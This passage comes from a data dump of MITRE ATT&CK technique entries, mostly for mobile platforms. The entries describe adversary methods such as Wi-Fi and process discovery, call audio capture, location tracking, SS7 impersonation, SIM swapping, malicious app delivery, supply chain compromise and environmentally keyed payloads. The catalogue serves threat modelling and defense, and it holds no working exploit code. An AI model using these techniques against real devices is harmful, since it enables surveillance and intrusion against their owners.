                              '\n'
                              'Adversaries may use the results and responses from these requests to determine if the '
                              'mobile devices are capable of communicating with adversary-owned C2 servers before '
                              'attempting to connect to them. The results may also be used to identify routes, '
                              'redirectors, and proxy servers.',
               'name': 'Internet Connection Discovery',
               'platforms': ['Android', 'iOS']},
 'T1422.002': {'attack_id': 'T1422.002',
               'categories': ['discovery'],
               'description': 'Adversaries may search for information about Wi-Fi networks, such as network names and '
                              'passwords, on compromised systems. Adversaries may use Wi-Fi information as part of '
                              '[Discovery](https://attack.mitre.org/tactics/TA0032) or [Credential '
                              'Access](https://attack.mitre.org/tactics/TA0031) activity to support both ongoing and '
                              'future campaigns. ',
               'name': 'Wi-Fi Discovery',
               'platforms': ['Android', 'iOS']},
 'T1423': {'attack_id': 'T1423',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of services running on remote hosts, including '
                          'those that may be vulnerable to remote software exploitation. Methods to acquire this '
                          'information include port scans and vulnerability scans from the mobile device. This '
                          "technique may take advantage of the mobile device's access to an internal enterprise "
                          'network either through local connectivity or through a Virtual Private Network (VPN).',
           'name': 'Network Service Scanning',
           'platforms': ['Android', 'iOS']},
 'T1424': {'attack_id': 'T1424',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get information about running processes on a device. Information '
                          'obtained could be used to gain an understanding of common software/applications running on '
                          'devices within a network. Adversaries may use the information from [Process '
                          'Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Recent Android security enhancements have made it more difficult to obtain a list of '
                          'running processes. On Android 7 and later, there is no way for an application to obtain the '
                          'process list without abusing elevated privileges. This is due to the Android kernel '
                          'utilizing the `hidepid` mount feature. Prior to Android 7, applications could utilize the '
                          '`ps` command or examine the `/proc` directory on the device.(Citation: '
                          'Android-SELinuxChanges) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'In iOS, applications have previously been able to use the `sysctl` command to obtain a list '
                          'of running processes. This functionality has been removed in later iOS versions. ',
           'name': 'Process Discovery',
           'platforms': ['Android', 'iOS']},
 'T1426': {'attack_id': 'T1426',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get detailed information about a device’s operating system and '
                          'hardware, including versions, patches, and architecture. Adversaries may use the '
                          'information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) '
                          'during automated discovery to shape follow-on behaviors, including whether or not to fully '
                          'infects the target and/or attempts specific actions. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On Android, much of this information is programmatically accessible to applications through '
                          'the `android.os.Build` class. (Citation: Android-Build) iOS is much more restrictive with '
                          'what information is visible to applications. Typically, applications will only be able to '
                          'query the device model and which version of iOS it is running. ',
           'name': 'System Information Discovery',
           'platforms': ['Android', 'iOS']},
 'T1427': {'attack_id': 'T1427',
           'categories': ['lateral-movement'],
           'description': 'With escalated privileges, an adversary could program the mobile device to impersonate USB '
                          'devices such as input devices (keyboard and mouse), storage devices, and/or networking '
                          'devices in order to attack a physically connected PC(Citation: '
                          'Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated '
                          'on Android. We are unaware of any demonstrations on iOS.',
           'name': 'Attack PC via USB Connection',
           'platforms': ['Android']},
 'T1428': {'attack_id': 'T1428',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may exploit remote services of enterprise servers, workstations, or other '
                          'resources to gain unauthorized access to internal systems once inside of a network. '
                          'Adversaries may exploit remote services by taking advantage of a mobile device’s access to '
                          'an internal enterprise network through local connectivity or through a Virtual Private '
                          'Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes '
                          'advantage of a programming error in a program, service, or within the operating system '
                          'software or kernel itself to execute adversary-controlled code. A common goal for '
                          'post-compromise exploitation of remote services is for lateral movement to enable access to '
                          'a remote system. \n'
                          '\n'
                          'An adversary may need to determine if the remote system is in a vulnerable state, which may '
                          'be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or '
                          'other Discovery methods. These look for common, vulnerable software that may be deployed in '
                          'the network, the lack of certain patches that may indicate vulnerabilities, or security '
                          'software that may be used to detect or contain remote exploitation. Servers are likely a '
                          'high value target for lateral movement exploitation, but endpoint systems may also be at '
                          'risk if they provide an advantage or access to additional resources.\n'
                          '\n'
                          'Depending on the permissions level of the vulnerable remote service, an adversary may '
                          'achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) '
                          'as a result of lateral movement exploitation as well. ',
           'name': 'Exploitation of Remote Services',
           'platforms': ['Android', 'iOS']},
 'T1429': {'attack_id': 'T1429',
           'categories': ['collection'],
           'description': 'Adversaries may capture audio to collect information by leveraging standard operating '
                          'system APIs of a mobile device. Examples of audio information adversaries may target '
                          'include user conversations, surroundings, phone calls, or other sensitive information. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'Android and iOS, by default, require that applications request device microphone access '
                          'from the user.  \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On Android devices, applications must hold the `RECORD_AUDIO` permission to access the '
                          'microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android '
                          'does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by '
                          'default, only privileged applications, such as those distributed by Google or the device '
                          'vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be '
                          'able to gain this access after successfully elevating their privileges. With the '
                          '`CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the '
                          '`MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing '
                          'capture of both voice call uplink and downlink.(Citation: Manifest.permission) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their '
                          '`Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)',
           'name': 'Audio Capture',
           'platforms': ['Android', 'iOS']},
 'T1430': {'attack_id': 'T1430',
           'categories': ['collection', 'discovery'],
           'description': 'Adversaries may track a device’s physical location through use of standard operating system '
                          'APIs via malicious or exploited applications on the compromised device. \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On Android, applications holding the `ACCESS_COAURSE_LOCATION` or `ACCESS_FINE_LOCATION` '
                          'permissions provide access to the device’s physical location. On Android 10 and up, '
                          'declaration of the `ACCESS_BACKGROUND_LOCATION` permission in an application’s manifest '
                          'will allow applications to request location access even when the application is running in '
                          'the background.(Citation: Android Request Location Permissions) Some adversaries have '
                          'utilized integration of Baidu map services to retrieve geographical location once the '
                          'location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo '
                          'Alto HenBox) \n'
                          '\n'
                          ' \n'
                          '\n'
                          'On iOS, applications must include the `NSLocationWhenInUseUsageDescription`, '
                          '`NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` '
                          'keys in their `Info.plist` file depending on the extent of requested access to location '
                          'information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and '
                          'up, applications call `requestWhenInUseAuthorization()` to request access to location '
                          'information when the application is in use or `requestAlwaysAuthorization()` to request '
                          'access to location information regardless of whether the application is in use. With '
                          'elevated privileges, an adversary may be able to access location data without explicit user '
                          'consent with the `com.apple.locationd.preauthorized` entitlement key.(Citation: Google '
                          'Project Zero Insomnia)',
           'name': 'Location Tracking',
           'platforms': ['Android', 'iOS']},
 'T1430.001': {'attack_id': 'T1430.001',
               'categories': ['collection', 'discovery'],
               'description': "An adversary may use access to cloud services (e.g. Google's Android Device Manager or "
                              "Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile "
                              'device management (MDM) server console to track the location of mobile devices managed '
                              'by the service.(Citation: Krebs-Location) ',
               'name': 'Remote Device Management Services',
               'platforms': ['Android', 'iOS']},
 'T1430.002': {'attack_id': 'T1430.002',
               'categories': ['collection', 'discovery'],
               'description': 'Adversaries may exploit the lack of authentication in signaling system network nodes to '
                              'track the to track the location of mobile devices by impersonating a node.(Citation: '
                              'Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: '
                              'Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) \n'
                              '\n'
                              ' \n'
                              '\n'
                              'By providing the victim’s MSISDN (phone number) and impersonating network internal '
                              'nodes to query subscriber information from other nodes, adversaries may use data '
                              'collected from each hop to eventually determine the device’s geographical cell area or '
                              'nearest cell tower.(Citation: Engel-SS7)',
               'name': 'Impersonate SS7 Nodes',
               'platforms': ['Android', 'iOS']},
 'T1436': {'attack_id': 'T1436',
           'categories': ['command-and-control', 'exfiltration'],
           'description': 'Adversaries may communicate over a commonly used port to bypass firewalls or network '
                          'detection systems and to blend with normal network activity to avoid more detailed '
                          'inspection. \n'
                          '\n'
                          'They may use commonly open ports such as\n'
                          '\n'
                          '* TCP:80 (HTTP)\n'
                          '* TCP:443 (HTTPS)\n'
                          '* TCP:25 (SMTP)\n'
                          '* TCP/UDP:53 (DNS)\n'
                          '\n'
                          'They may use the protocol associated with the port or a completely different protocol.',
           'name': 'Commonly Used Port',
           'platforms': ['Android', 'iOS']},
 'T1437': {'attack_id': 'T1437',
           'categories': ['command-and-control'],
           'description': 'Adversaries may communicate using application layer protocols to avoid detection/network '
                          'filtering by blending in with existing traffic. Commands to the mobile device, and often '
                          'the results of those commands, will be embedded within the protocol traffic between the '
                          'mobile device and server. \n'
                          '\n'
                          'Adversaries may utilize many different protocols, including those used for web browsing, '
                          'transferring files, electronic mail, or DNS.',
           'name': 'Application Layer Protocol',
           'platforms': ['Android', 'iOS']},
 'T1437.001': {'attack_id': 'T1437.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with web '
                              'protocols traffic to avoid detection/network filtering by blending in with existing '
                              'traffic. Commands to remote mobile devices, and often the results of those commands, '
                              'will be embedded within the protocol traffic between the mobile client and server. \n'
                              '\n'
                              'Web protocols such as HTTP and HTTPS are used for web traffic as well as well as '
                              'notification services native to mobile messaging services such as Google Cloud '
                              'Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way '
                              'communication) and Apple Push Notification Service (APNS; one-way server-to-device).  '
                              'Such notification services leverage HTTP/S via the respective API and are commonly '
                              'abused on Android and iOS respectively in order blend in with routine device traffic '
                              'making it difficult for enterprises to inspect. ',
               'name': 'Web Protocols',
               'platforms': ['Android', 'iOS']},
 'T1444': {'attack_id': 'T1444',
           'categories': ['initial-access', 'defense-evasion'],
           'description': 'An adversary could distribute developed malware by masquerading the malware as a legitimate '
                          'application. This can be done in two different ways: by embedding the malware in a '
                          'legitimate application, or by pretending to be a legitimate application.\n'
                          '\n'
                          'Embedding the malware in a legitimate application is done by downloading the application, '
                          'disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The '
                          'app would appear to be the original app, but would contain additional malicious '
                          'functionality. The adversary could then publish the malicious application to app stores or '
                          'use another delivery method.\n'
                          '\n'
                          'Pretending to be a legitimate application relies heavily on lack of scrutinization by the '
                          'user. Typically, a malicious app pretending to be a legitimate one will have many similar '
                          'details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto '
                          'HenBox)\n'
                          '\n'
                          'Malicious applications may also masquerade as legitimate applications when requesting '
                          'access to the accessibility service in order to appear as legitimate to the user, '
                          'increasing the likelihood that the access will be granted.',
           'name': 'Masquerade as Legitimate Application',
           'platforms': ['Android', 'iOS']},
 'T1449': {'attack_id': 'T1449',
           'categories': ['network-effects'],
           'description': 'An adversary could exploit signaling system vulnerabilities to redirect calls or text '
                          "messages (SMS) to a phone number under the attacker's control. The adversary could then act "
                          'as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: '
                          'Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) '
                          '(Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries '
                          'to obtain authentication codes used for multi-factor authentication(Citation: '
                          'TheRegister-SS7).',
           'name': 'Exploit SS7 to Redirect Phone Calls/SMS',
           'platforms': ['Android', 'iOS']},
 'T1451': {'attack_id': 'T1451',
           'categories': ['network-effects'],
           'description': 'An adversary could convince the mobile network operator (e.g. through social networking, '
                          'forged identification, or insider attacks performed by trusted employees) to issue a new '
                          'SIM card and associate it with an existing phone number and account.(Citation: '
                          'NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages '
                          'or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)\n'
                          '\n'
                          'One use case is intercepting authentication messages or phone calls to obtain illicit '
                          'access to online banking or other online accounts, as many online services allow account '
                          'password resets by sending an authentication code over SMS to a phone number associated '
                          'with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: '
                          'Krebs-SimSwap)(Citation: TechCrunch-SimSwap)',
           'name': 'SIM Card Swap',
           'platforms': ['Android', 'iOS']},
 'T1453': {'attack_id': 'T1453',
           'categories': ['collection', 'credential-access', 'impact', 'defense-evasion'],
           'description': '**This technique has been deprecated. Please use [Input '
                          'Capture](https://attack.mitre.org/techniques/T1417), [Input '
                          'Injection](https://attack.mitre.org/techniques/T1516), and [Input '
                          'Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**\n'
                          '\n'
                          "A malicious app could abuse Android's accessibility features to capture sensitive data or "
                          'perform other malicious actions.(Citation: Skycure-Accessibility)\n'
                          '\n'
                          "Adversaries may abuse accessibility features on Android to emulate a user's clicks, for "
                          "example to steal money from a user's bank account.(Citation: "
                          'android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)\n'
                          '\n'
                          'Adversaries may abuse accessibility features on Android devices to evade defenses by '
                          'repeatedly clicking the "Back" button when a targeted app manager or mobile security app is '
                          'launched, or when strings suggesting uninstallation are detected in the foreground. This '
                          'effectively prevents the malicious application from being uninstalled.(Citation: '
                          'android-trojan-steals-paypal-2fa)',
           'name': 'Abuse Accessibility Features',
           'platforms': ['Android']},
 'T1456': {'attack_id': 'T1456',
           'categories': ['initial-access'],
           'description': 'Adversaries may gain access to a system through a user visiting a website over the normal '
                          "course of browsing. With this technique, the user's web browser is typically targeted for "
                          'exploitation, but adversaries may also use compromised websites for non-exploitation '
                          'behavior such as acquiring an [Application Access '
                          'Token](https://attack.mitre.org/techniques/T1550/001).\n'
                          '\n'
                          'Multiple ways of delivering exploit code to a browser exist, including:\n'
                          '\n'
                          '* A legitimate website is compromised where adversaries have injected some form of '
                          'malicious code such as JavaScript, iFrames, and cross-site scripting.\n'
                          '* Malicious ads are paid for and served through legitimate ad providers.\n'
                          '* Built-in web application interfaces are leveraged for the insertion of any other kind of '
                          'object that can be used to display web content or contain a script that executes on the '
                          'visiting client (e.g. forum posts, comments, and other user controllable web content).\n'
                          '\n'
                          'Often the website used by an adversary is one visited by a specific community, such as '
                          'government, a particular industry, or region, where the goal is to compromise a specific '
                          'user or set of users based on a shared interest. This kind of targeted attack is referred '
                          'to a strategic web compromise or watering hole attack. There are several known examples of '
                          'this occurring.(Citation: Lookout-StealthMango)\n'
                          '\n'
                          'Typical drive-by compromise process:\n'
                          '\n'
                          '1. A user visits a website that is used to host the adversary controlled content.\n'
                          '2. Scripts automatically execute, typically searching versions of the browser and plugins '
                          'for a potentially vulnerable version. \n'
                          '    * The user may be required to assist in this process by enabling scripting or active '
                          'website components and ignoring warning dialog boxes.\n'
                          '3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n'
                          '4. If exploitation is successful, then it will give the adversary code execution on the '
                          "user's system unless other protections are in place.\n"
                          '    * In some cases a second visit to the website after the initial scan is required before '
                          'exploit code is delivered.',
           'name': 'Drive-By Compromise',
           'platforms': ['Android', 'iOS']},
 'T1458': {'attack_id': 'T1458',
           'categories': ['initial-access', 'lateral-movement'],
           'description': 'Adversaries may move onto devices by exploiting or copying malware to devices connected via '
                          'USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a '
                          'device to a compromised or malicious charging station or PC to bypass application store '
                          'requirements and install malicious applications directly.(Citation: Lau-Mactans) In the '
                          'case of Initial Access, adversaries may attempt to exploit the device via the connection to '
                          'gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this '
                          'include: \n'
                          ' \n'
                          '* Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the '
                          'ability to perform actions including intercepting phone calls, intercepting network '
                          'traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB) \n'
                          '* Exploiting weakly-enforced security boundaries in Android devices such as the Google '
                          'Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal) \n'
                          '* Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices '
                          'using physical access to the data port to unlock the passcode.(Citation: '
                          'Computerworld-iPhoneCracking) ',
           'name': 'Replication Through Removable Media',
           'platforms': ['Android', 'iOS']},
 'T1461': {'attack_id': 'T1461',
           'categories': ['initial-access'],
           'description': 'An adversary with physical access to a mobile device may seek to bypass the device’s '
                          'lockscreen. Several methods exist to accomplish this, including:\n'
                          '\n'
                          '* Biometric spoofing: If biometric authentication is used, an adversary could attempt to '
                          'spoof a mobile device’s biometric authentication mechanism. Both iOS and Android partly '
                          'mitigate this attack by requiring the device’s passcode rather than biometrics to unlock '
                          'the device after every device restart, and after a set or random amount of time.(Citation: '
                          'SRLabs-Fingerprint)(Citation: TheSun-FaceID)\n'
                          '* Unlock code bypass: An adversary could attempt to brute-force or otherwise guess the '
                          'lockscreen passcode (typically a PIN or password), including physically observing '
                          '(“shoulder surfing”) the device owner’s use of the lockscreen passcode. Mobile OS vendors '
                          'partly mitigate this by implementing incremental backoff timers after a set number of '
                          'failed unlock attempts, as well as a configurable full device wipe after several failed '
                          'unlock attempts.\n'
                          '* Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile '
                          'devices to bypass the lockscreen. The vulnerabilities are generally patched by the device '
                          'or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: '
                          'Kaspersky-iOSBypass)\n',
           'name': 'Lockscreen Bypass',
           'platforms': ['Android', 'iOS']},
 'T1464': {'attack_id': 'T1464',
           'categories': ['impact'],
           'description': 'Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the '
                          'availability of targeted resources to users. Network DoS can be performed by exhausting the '
                          'network bandwidth that services rely on, or by jamming the signal going to or coming from '
                          'devices. \n'
                          '\n'
                          'A Network DoS will occur when an adversary is able to jam radio signals (e.g. Wi-Fi, '
                          'cellular, GPS) around a device to prevent it from communicating. For example, to jam '
                          'cellular signal, an adversary may use a handheld signal jammer, which jam devices within '
                          'the jammer’s operational range.(Citation: NIST-SP800187) \n'
                          '\n'
                          'Usage of cellular jamming has been documented in several arrests reported in the '
                          'news.(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: '
                          'Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)',
           'name': 'Network Denial of Service',
           'platforms': ['Android', 'iOS']},
 'T1469': {'attack_id': 'T1469',
           'categories': ['remote-service-effects'],
           'description': 'An adversary who is able to obtain unauthorized access to or misuse authorized access to '
                          "cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or "
                          'to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).',
           'name': 'Remotely Wipe Data Without Authorization',
           'platforms': ['Android', 'iOS']},
 'T1470': {'attack_id': 'T1470',
           'categories': ['remote-service-effects'],
           'description': 'An adversary who is able to obtain unauthorized access to or misuse authorized access to '
                          "cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use "
                          'that access to obtain sensitive data stored in device backups. For example, the Elcomsoft '
                          "Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's "
                          'iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) '
                          'obtaining WhatsApp communication histories from backups stored in iCloud.',
           'name': 'Obtain Device Cloud Backups',
           'platforms': ['Android', 'iOS']},
 'T1471': {'attack_id': 'T1471',
           'categories': ['impact'],
           'description': 'An adversary may encrypt files stored on a mobile device to prevent the user from accessing '
                          'them. This may be done in order to extract monetary compensation from a victim in exchange '
                          'for decryption or a decryption key (ransomware) or to render data permanently inaccessible '
                          'in cases where the key is not saved or transmitted.',
           'name': 'Data Encrypted for Impact',
           'platforms': ['Android']},
 'T1474': {'attack_id': 'T1474',
           'categories': ['initial-access'],
           'description': 'Adversaries may manipulate products or product delivery mechanisms prior to receipt by a '
                          'final consumer for the purpose of data or system compromise.\n'
                          '\n'
                          'Supply chain compromise can take place at any stage of the supply chain including:\n'
                          '\n'
                          '* Manipulation of development tools\n'
                          '* Manipulation of a development environment\n'
                          '* Manipulation of source code repositories (public or private)\n'
                          '* Manipulation of source code in open-source dependencies\n'
                          '* Manipulation of software update/distribution mechanisms\n'
                          '* Compromised/infected system images\n'
                          '* Replacement of legitimate software with modified versions\n'
                          '* Sales of modified/counterfeit products to legitimate distributors\n'
                          '* Shipment interdiction\n'
                          '\n'
                          'While supply chain compromise can impact any component of hardware or software, attackers '
                          'looking to gain execution have often focused on malicious additions to legitimate software '
                          'in software distribution or update channels. Targeting may be specific to a desired victim '
                          'set or malicious software may be distributed to a broad set of consumers but only move on '
                          'to additional tactics on specific victims.  Popular open source projects that are used as '
                          'dependencies in many applications may also be targeted as a means to add malicious code to '
                          'users of the dependency, specifically with the widespread usage of third-party advertising '
                          'libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)',
           'name': 'Supply Chain Compromise',
           'platforms': ['Android', 'iOS']},
 'T1474.001': {'attack_id': 'T1474.001',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate products or product delivery mechanisms prior to receipt by '
                              'a final consumer for the purpose of data or system compromise. Applications often '
                              'depend on external software to function properly. Popular open source projects that are '
                              'used as dependencies in many applications may be targeted as a means to add malicious '
                              'code to users of the dependency.(Citation: Grace-Advertisement)',
               'name': 'Compromise Software Dependencies and Development Tools',
               'platforms': ['Android', 'iOS']},
 'T1474.002': {'attack_id': 'T1474.002',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate hardware components in products prior to receipt by a final '
                              'consumer for the purpose of data or system compromise. By modifying hardware or '
                              'firmware in the supply chain, adversaries can insert a backdoor into consumer networks '
                              'that may be difficult to detect and give the adversary a high degree of control over '
                              'the system. ',
               'name': 'Compromise Hardware Supply Chain',
               'platforms': ['Android', 'iOS']},
 'T1474.003': {'attack_id': 'T1474.003',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate application software prior to receipt by a final consumer '
                              'for the purpose of data or system compromise. Supply chain compromise of software can '
                              'take place in a number of ways, including manipulation of the application source code, '
                              'manipulation of the update/distribution mechanism for that software, or replacing '
                              'compiled releases with a modified version.',
               'name': 'Compromise Software Supply Chain',
               'platforms': ['Android', 'iOS']},
 'T1475': {'attack_id': 'T1475',
           'categories': ['initial-access'],
           'description': 'Malicious applications are a common attack vector used by adversaries to gain a presence on '
                          'mobile devices. Mobile devices often are configured to allow application installation only '
                          'from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may '
                          'seek to place a malicious application in an authorized app store, enabling the application '
                          'to be installed onto targeted devices.\n'
                          '\n'
                          'App stores typically require developer registration and use vetting techniques to identify '
                          'malicious applications. Adversaries may use these techniques against app store defenses:\n'
                          '\n'
                          '* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n'
                          '* [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)\n'
                          '\n'
                          'Adversaries may also seek to evade vetting by placing code in a malicious application to '
                          'detect whether it is running in an app analysis environment and, if so, avoid performing '
                          'malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) '
                          '(Citation: Percoco-Bouncer) (Citation: Wang)\n'
                          '\n'
                          'Adversaries may also use fake identities, payment cards, etc., to create developer accounts '
                          'to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n'
                          '\n'
                          "Adversaries may also use control of a target's Google account to use the Google Play "
                          "Store's remote installation capability to install apps onto the Android devices associated "
                          'with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only '
                          'applications that are available for download through the Google Play Store can be remotely '
                          'installed using this technique.)',
           'name': 'Deliver Malicious App via Authorized App Store',
           'platforms': ['Android', 'iOS']},
 'T1476': {'attack_id': 'T1476',
           'categories': ['initial-access'],
           'description': 'Malicious applications are a common attack vector used by adversaries to gain a presence on '
                          'mobile devices. This technique describes installing a malicious application on targeted '
                          'mobile devices without involving an authorized app store (e.g., Google Play Store or Apple '
                          'App Store). Adversaries may wish to avoid placing malicious applications in an authorized '
                          'app store due to increased potential risk of detection or other reasons. However, mobile '
                          'devices often are configured to allow application installation only from an authorized app '
                          'store which would prevent this technique from working.\n'
                          '\n'
                          'Delivery methods for the malicious application include:\n'
                          '\n'
                          '* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the '
                          'mobile app package as an attachment to an email message.\n'
                          '* [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to '
                          'the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, '
                          'WhatsApp, etc.), web site, QR code, or other means.\n'
                          '* Third-Party App Store - Installed from a third-party app store (as opposed to an '
                          'authorized app store that the device implicitly trusts as part of its default behavior), '
                          'which may not apply the same level of scrutiny to apps as applied by an authorized app '
                          'store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: '
                          'TrendMicro-FlappyBird)\n'
                          '\n'
                          'Some Android malware comes with functionality to install additional applications, either '
                          'automatically or when the adversary instructs it to.(Citation: '
                          'android-trojan-steals-paypal-2fa)',
           'name': 'Deliver Malicious App via Other Means',
           'platforms': ['Android', 'iOS']},
 'T1477': {'attack_id': 'T1477',
           'categories': ['initial-access'],
           'description': 'The mobile device may be targeted for exploitation through its interface to cellular '
                          'networks or other radio interfaces.\n'
                          '\n'
                          '### Baseband Vulnerability Exploitation\n'
                          '\n'
                          'A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, '
                          'NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit '
                          'a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: '
                          'Weinmann-Baseband).\n'
                          '\n'
                          '### Malicious SMS Message\n'
                          '\n'
                          'An SMS message could contain content designed to exploit vulnerabilities in the SMS parser '
                          'on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a '
                          'link to a web site containing malicious content designed to exploit the device web browser. '
                          'Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: '
                          'SRLabs-SIMCard).',
           'name': 'Exploit via Radio Interfaces',
           'platforms': ['Android', 'iOS']},
 'T1480': {'attack_id': 'T1480',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use execution guardrails to constrain execution or actions based on '
                          'adversary supplied and environment specific conditions that are expected to be present on '
                          'the target. Guardrails ensure that a payload only executes against an intended target and '
                          'reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia '
                          'Guardrails) Values an adversary can provide about a target system or environment to use as '
                          'guardrails may include specific network share names, attached physical devices, files, '
                          'joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye '
                          'Outlook Dec 2019)\n'
                          '\n'
                          'Guardrails can be used to prevent exposure of capabilities in environments that are not '
                          'intended to be compromised or operated within. This use of guardrails is distinct from '
                          'typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While '
                          'use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may '
                          'involve checking for known sandbox values and continuing with execution only if there is no '
                          'match, the use of guardrails will involve checking for an expected target-specific value '
                          'and only continuing with execution if there is such a match.',
           'name': 'Execution Guardrails',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1480.001': {'attack_id': 'T1480.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may environmentally key payloads or other features of malware to evade '
                              'defenses and constraint execution to a specific target environment. Environmental '
                              'keying uses cryptography to constrain execution or actions based on adversary supplied '
                              'environment specific conditions that are expected to be present on the target. '
                              'Environmental keying is an implementation of [Execution '
                              'Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic '
                              'techniques for deriving encryption/decryption keys from specific types of values in a '
                              'given computing environment.(Citation: EK Clueless Agents)\n'
                              '\n'
                              'Values can be derived from target-specific elements and used to generate a decryption '
                              'key for an encrypted payload. Target-specific values can be derived from specific '
                              'network shares, physical devices, software/software versions, files, joined AD domains, '
                              'system time, and local/external IP addresses.(Citation: Kaspersky Gauss '
                              'Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware '
                              'Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By '
                              'generating the decryption keys from target-specific environmental values, environmental '
                              'keying can make sandbox detection, anti-virus detection, crowdsourcing of information, '
                              'and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: '
                              'Ebowla: Genetic Malware) These difficulties can slow down the incident response process '
                              'and help adversaries hide their tactics, techniques, and procedures (TTPs).\n'
                              '\n'
                              'Similar to [Obfuscated Files or '
                              'Information](https://attack.mitre.org/techniques/T1027), adversaries may use '
                              'environmental keying to help protect their TTPs and evade detection. Environmental '
                              'keying may be used to deliver an encrypted payload to the target that will use '
                              'target-specific values to decrypt the payload before execution.(Citation: Kaspersky '
                              'Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed '
                              'HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By '
                              'utilizing target-specific values to decrypt the payload the adversary can avoid '
                              'packaging the decryption key with the payload or sending it over a potentially '
                              'monitored network connection. Depending on the technique for gathering target-specific '
                              'values, reverse engineering of the encrypted payload can be exceptionally '
